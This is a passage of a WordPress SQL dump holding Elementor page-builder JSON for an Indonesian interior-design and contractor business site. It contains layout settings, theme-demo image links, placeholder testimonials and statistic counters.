penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi perencanaan & interior design\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"ced22e0\"},{\"text\":\"Penyusunan Rencana Anggaran Belanja\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Produksi furniture dan pekerjaan sipil\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"f3caa1a\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\"},\"elements\":[{\"id\":\"697046f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20},\"elements\":[{\"id\":\"4b2c591\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/09\\/john_allan.jpg\",\"id\":4839,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_element_width\":\"auto\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"_border_color\":\"#E3B25A\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"9b875c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":79.92,\"space_between_widgets\":10},\"elements\":[{\"id\":\"1150f91\",\"elType\":\"widget\",\"settings\":{\"title\":\"John Alan\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h3\",\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"23ae2ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"CO - FOUNDER\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e8e90de\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5b19198\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d460dea\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking about BauHaus\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"da0b416\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"11f956f\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"d232423\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#E3B25A\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8056628\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\",\"_id\":\"51a9c88\"}],\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9c560b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"63f0bcf\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9b446cc\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"94218cd\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9ac0b32\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"f80af3e\"}],\"background_item_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"-15\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"bounceInUp\",\"_animation_tablet\":\"none\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"dot_control\":\"yes\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges in deploying\\ninterior design applications\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or call: \",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"+ 1800-111-543 \",\"phone_address\":\"1800111543\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":6800},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Architectures\",\"number\":906,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Service providing\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy customers\",\"number\":9760,\"icon\":{\"value\":\"flaticon flaticon-satisfaction\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4388608\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b6b9eaa\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a2ebcc\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our Architects\",\"title\":\"Our expert team\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"9d2f9e3\",\"elType\":\"widget\",\"settings\":{\"info_background_background\":\"classic\",\"info_background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-lines-team.png\",\"id\":937,\"alt\":\"\",\"source\":\"library\"},\"info_background_position\":\"top right\",\"info_background_repeat\":\"no-repeat\",\"total_count\":6,\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_team\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7836724\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b90ed21\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b88a577\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01.png\",\"id\":752,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ad43d0d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"35d31c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02.png\",\"id\":753,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0eaabe3\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4c51b79\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03.png\",\"id\":754,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ee06889\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02c4aae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04.png\",\"id\":755,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c6b5264\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c3c96cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05.jpg.png\",\"id\":757,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6720e69\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"77fc613\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06.png\",\"id\":756,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(3886,4873,'_elementor_page_assets','a:1:{s:6:\"styles\";a:4:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";}}'),(3887,4873,'_elementor_pro_version','3.8.1'),(3888,4873,'_elementor_css','a:6:{s:4:\"time\";i:1695372643;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:4:{i:0;s:8:\"fa-solid\";i:3;s:3:\"all\";i:4;s:0:\"\";i:6;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3889,4874,'_wp_page_template','elementor_header_footer'),(3890,4874,'_elementor_edit_mode','builder'),(3891,4874,'_elementor_template_type','wp-page'),(3892,4874,'_elementor_version','3.8.1'),(3893,4874,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-get-to-know-us.jpg\",\"id\":710,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"John Alan\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Pengusaha di bidang kontraktor, konsultan interior design, property developer, hotel dan F&amp;B yang telah berpengalaman sejak tahun 2005.<\\/p><p>Selain sebagai pengusaha, John Alan juga merupakan business coach yang aktif dalam mengembangkan komunitas wirausaha dan telah berkolaborasi dengan para pakar di berbagai industri.<\\/p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi perencanaan & interior design\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"ced22e0\"},{\"text\":\"Penyusunan Rencana Anggaran Belanja\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Produksi furniture dan pekerjaan sipil\",\"selected_icon\":{\"value\":\"fas 